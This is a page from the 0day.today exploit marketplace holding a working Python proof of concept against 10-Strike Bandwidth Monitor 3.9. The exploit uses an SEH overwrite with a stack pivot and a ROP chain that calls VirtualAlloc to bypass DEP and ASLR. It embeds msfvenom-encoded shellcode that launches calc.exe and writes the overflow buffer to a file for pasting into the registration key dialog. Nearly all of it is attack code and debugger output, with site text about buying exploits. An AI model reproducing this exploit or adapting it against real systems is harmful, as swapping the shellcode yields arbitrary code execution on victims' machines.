0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
10-Strike Bandwidth Monitor 3.9 Buffer Overflow Exploit
[# Exploit Title: 10-Strike Bandwidth Monitor 3.9 - ROP VirtualAlloc - Buffer Overflow (SEH,DEP,ASLR)
# Exploit Author: Bobby Cooke
# Date: June 7th, 2020
# Vendor Site: https://www.10-strike.com/
# Software Download: https://www.10-strike.com/bandwidth-monitor/bandwidth-monitor.exe
# Tested On: Windows 10 - Pro 1909 (x86)
# Version: version 3.9
# Exploit Details:
# 1. Bypass SafeSEH by overwriting the Structured Exception Handler (SEH) with a Stack-Pivot return address located in the [BandMonitor.exe] memory-space; as it was not compiled with the SafeSEH Protection.
# 2. The Stack-Pivot will land in a RET Sled; as the process's offset on the Stack is different every time.
# - StackPivot lands at a different offset, 1:660; 2:644; 3:676; 4:692; 5:696; 6:688; 7:692
# 3. Bypass Address Space Layout Randomization (ASLR) & Data Execution Protection (DEP) using Return Orientation Programming (ROP), choosing Gadgets from the [ssleay32.dll], [BandMonitor.exe], and [LIBEAY32.dll]; as they are not compiled with Rebase or ASLR.
# 4. A pointer to the VirtualAlloc symbol exists in the import table of the [LIBEAY32.dll] module. Use Gadgets to call VirtualAlloc and Bypass DEP.
# 5. Pass execution to shellcode and PopCalc.
# - Bad Characters: \x00 => \x20 ; \x0D & \x0A => Truncates buffer
# Recreate:
# Turn On DEP: This PC > Properties > Advanced System Settings > Advanced > Performance > Settings > Data Execution Prevention > "Turn on DEP for all programs and services except those I select:" > OK > Restart
# Install > Run Exploit > Copy buffer from poc.txt > Start BandMonitor > Help > Enter Reg Key > Paste > Exploit
# Base | Top | Rebase | SafeSEH | ASLR | NXCompat | OS Dll | Modulename
# -------------------------------------------------------------------------------------------
# 0x12000000 | 0x12057000 | False | True | False | False | False | [ssleay32.dll]
# 0x00400000 | 0x01247000 | False | False | False | False | False | [BandMonitor.exe]
# 0x11000000 | 0x11155000 | False | True | False | False | False | [LIBEAY32.dll]
# -------------------------------------------------------------------------------------------
import struct
OS_retSled = '\x41'*400
retSled = '\x24\x01\x06\x11'*100 #11060124 # retn [LIBEAY32.dll] {PAGE_EXECUTE_READ}
# EAX 110E7198 <&KERNEL32.VirtualAlloc>
# ECX 00000040
# EDX 00001000
# EBX 00000001
# ESP 0014EAA4
# EBP 1202EF02 ssleay32.1202EF02
# ESI 110495EF LIBEAY32.110495EF
# EDI 01225803 BandMoni.01225803
# EIP 76C647D0 KERNEL32.VirtualAlloc
# 0014EAA0 110495EF .... LIBEAY32.110495EF
# 0014EAA4 1202EF02 .... /CALL to VirtualAlloc
# 0014EAA8 0014EABC .... |Address = 0014EABC
# 0014EAAC 00000001 .... |Size = 1
# 0014EAB0 00001000 .... |AllocationType = MEM_COMMIT
# 0014EAB4 00000040 @... \Protect = PAGE_EXECUTE_READWRITE
# 0014EAB8 110E7198 .q.. <&KERNEL32.VirtualAlloc>
# 0014EABC 110843B4 .C.. LIBEAY32.110843B4
# 0014EAC0 90909090 ....
def createRopChain():
# rop chain generated with mona.py - www.corelan.be
ropGadgets = [
0x1202ef02, # POP EBP # RETN [ssleay32.dll]
0x1202ef02, # skip 4 bytes [ssleay32.dll]
0x01215f16, # POP EBX # RETN [BandMonitor.exe]
0xffffffff, #
0x012175f5, # INC EBX # RETN [BandMonitor.exe]
0x01056ff7, # INC EBX # RETN [BandMonitor.exe]
0x011e94d4, # POP EDX # RETN [BandMonitor.exe]
0xffffefff, # Value to negate, destination value : 0x00001000
0x01218952, # NEG EDX # RETN [BandMonitor.exe]
0x011ead1b, # DEC EDX # RETN [BandMonitor.exe]
0x110c5b5e, # POP ECX # RETN [LIBEAY32.dll]
0xffffffff, #
0x11016023, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1101597d, # INC ECX # RETN [LIBEAY32.dll]
0x1202fe55, # POP EDI # RETN [ssleay32.dll]
0x01225803, # RETN (ROP NOP) [BandMonitor.exe]
0x1105ed16, # POP ESI # RETN [LIBEAY32.dll]
0x110495ef, # JMP [EAX] [LIBEAY32.dll]
0x012126f5, # POP EAX # RETN [BandMonitor.exe]
0x110e7198, # ptr to &VirtualAlloc() [IAT LIBEAY32.dll]
0x110762c4, # PUSHAD # RETN [LIBEAY32.dll]
0x110843b4, # ptr to 'push esp # ret ' [LIBEAY32.dll]
]
return ''.join(struct.pack('<I', _) for _ in ropGadgets)
ropChain = createRopChain()
nopSled = '\x90'*100
# boku@kali# msfvenom -p windows/exec CMD='calc.exe' -b '\x00\x0d\x0a' -v shellcode -a x86 -f python --platform windows
# x86/shikata_ga_nai chosen with final size 220
shellcode = b""
shellcode += b"\xbf\xd2\xa1\xc4\xd3\xda\xdb\xd9\x74\x24\xf4"
shellcode += b"\x5e\x31\xc9\xb1\x31\x83\xc6\x04\x31\x7e\x0f"
shellcode += b"\x03\x7e\xdd\x43\x31\x2f\x09\x01\xba\xd0\xc9"
shellcode += b"\x66\x32\x35\xf8\xa6\x20\x3d\xaa\x16\x22\x13"
shellcode += b"\x46\xdc\x66\x80\xdd\x90\xae\xa7\x56\x1e\x89"
shellcode += b"\x86\x67\x33\xe9\x89\xeb\x4e\x3e\x6a\xd2\x80"
shellcode += b"\x33\x6b\x13\xfc\xbe\x39\xcc\x8a\x6d\xae\x79"
shellcode += b"\xc6\xad\x45\x31\xc6\xb5\xba\x81\xe9\x94\x6c"
shellcode += b"\x9a\xb3\x36\x8e\x4f\xc8\x7e\x88\x8c\xf5\xc9"
shellcode += b"\x23\x66\x81\xcb\xe5\xb7\x6a\x67\xc8\x78\x99"
shellcode += b"\x79\x0c\xbe\x42\x0c\x64\xbd\xff\x17\xb3\xbc"
shellcode += b"\xdb\x92\x20\x66\xaf\x05\x8d\x97\x7c\xd3\x46"
shellcode += b"\x9b\xc9\x97\x01\xbf\xcc\x74\x3a\xbb\x45\x7b"
shellcode += b"\xed\x4a\x1d\x58\x29\x17\xc5\xc1\x68\xfd\xa8"
shellcode += b"\xfe\x6b\x5e\x14\x5b\xe7\x72\x41\xd6\xaa\x18"
shellcode += b"\x94\x64\xd1\x6e\x96\x76\xda\xde\xff\x47\x51"
shellcode += b"\xb1\x78\x58\xb0\xf6\x77\x12\x99\x5e\x10\xfb"
shellcode += b"\x4b\xe3\x7d\xfc\xa1\x27\x78\x7f\x40\xd7\x7f"
shellcode += b"\x9f\x21\xd2\xc4\x27\xd9\xae\x55\xc2\xdd\x1d"
shellcode += b"\x55\xc7\xbd\xc0\xc5\x8b\x6f\x67\x6e\x29\x70"
OS_nSEH = '\x43'*(4188-600-200-len(ropChain+nopSled+shellcode))
nSEH = '\x44'*4
# Stack pivot offset to controllable buffer: 1408 (0x580) bytes
SEH = '\x70\x28\x21\x01' # 0x01212870 : {pivot 2064 / 0x810}
extra = '\x44'*2000
buffer = OS_retSled + retSled + ropChain + nopSled + shellcode + OS_nSEH + nSEH + SEH + extra
File = 'poc.txt'
try:
payload = buffer
f = open(File, 'w')
f.write(payload)
f.close()
print File + " created successfully"
except:
print File + ' failed to create'
# 0day.today [2024-11-16] #